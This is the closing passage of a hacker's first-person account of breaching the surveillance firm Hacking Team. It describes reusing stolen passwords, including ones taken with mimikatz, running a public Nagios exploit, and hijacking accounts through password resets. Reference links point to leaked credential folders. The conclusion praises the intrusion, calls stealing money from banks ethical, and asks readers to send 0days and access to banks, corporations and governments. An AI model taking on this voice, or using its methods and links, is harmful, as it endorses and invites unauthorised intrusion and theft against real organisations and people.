    [3] https://www.trustedsec.com/june-2015/no_psexec_needed/
    [4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
    [5] http://pwnwiki.io/#!presence/windows/find_files.md
    [6] http://archive.is/TbaPy
    [7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
    [8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
    [9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/


    --[ 15 - The bridge ]-----------------------------------------------------------

    Within Christian Pozzi's Truecrypt volume, there was a textfile with many
    passwords [1]. One of those was for a Fully Automated Nagios server, which had
    access to the Sviluppo network in order to monitor it. I'd found the bridge I
    needed. The textfile just had the password to the web interface, but there was
    a public code execution exploit [2] (it's an unauthenticated exploit, but it
    requires that at least one user has a session initiated, for which I used the
    password from the textfile).

    [1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
    [2] http://seclists.org/fulldisclosure/2014/Oct/78


    --[ 16 - Reusing and resetting passwords ]--------------------------------------

    Reading the emails, I'd seen Daniele Milan granting access to git repos. I
    already had his windows password thanks to mimikatz. I tried it on the git
    server and it worked. Then I tried sudo and it worked. For the gitlab server
    and their twitter account, I used the "forgot my password" function along with
    my access to their mail server to reset the passwords.


    --[ 17 - Conclusion ]-----------------------------------------------------------

    That's all it takes to take down a company and stop their human rights abuses.
    That's the beauty and asymmetry of hacking: with 100 hours of work, one person
    can undo years of work by a multi-million dollar company. Hacking gives the
    underdog a chance to fight and win.

    Hacking guides often end with a disclaimer: this information is for
    educational purposes only, be an ethical hacker, don't attack systems you
    don't have permission to, etc. I'll say the same, but with a more rebellious
    conception of "ethical" hacking. Leaking documents, expropriating money from
    banks, and working to secure the computers of ordinary people is ethical
    hacking. However, most people that call themselves "ethical hackers" just work
    to secure those who pay their high consulting fees, who are often those most
    deserving to be hacked.

    Hacking Team saw themselves as part of a long line of inspired Italian design
    [1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
    and government, as part of a long tradition of Italian fascism. I'd like to
    dedicate this guide to the victims of the raid on the Armando Diaz school, and
    to all those who have had their blood spilled by Italian fascists.

    [1] https://twitter.com/coracurrier/status/618104723263090688


    --[ 18 - Contact ]--------------------------------------------------------------

    To send me spear phishing attempts, death threats in Italian [1][2], and to
    give me 0days or access inside banks, corporations, governments, etc.

    [1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
    [2] https://twitter.com/CthulhuSec/status/619459002854977537

    only encrypted email please:
    https://securityinabox.org/es/thunderbird_usarenigmail
    -----BEGIN PGP PUBLIC KEY BLOCK-----

    mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
    vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
    27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
    +fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
    VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
    Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
    Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
    BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
    QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
    cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
    JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
    4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
    X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
    VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
    oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
    n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
    Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
    WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
    jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
    CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
    OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
    LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
    JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
    Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
    D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
    =E5+y
    -----END PGP PUBLIC KEY BLOCK-----



    If not you, who? If not now, when?
    _ _ _ ____ _ _
    | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
    | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
    | _ | (_| | (__| < | |_) | (_| | (__| <|_|
    |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)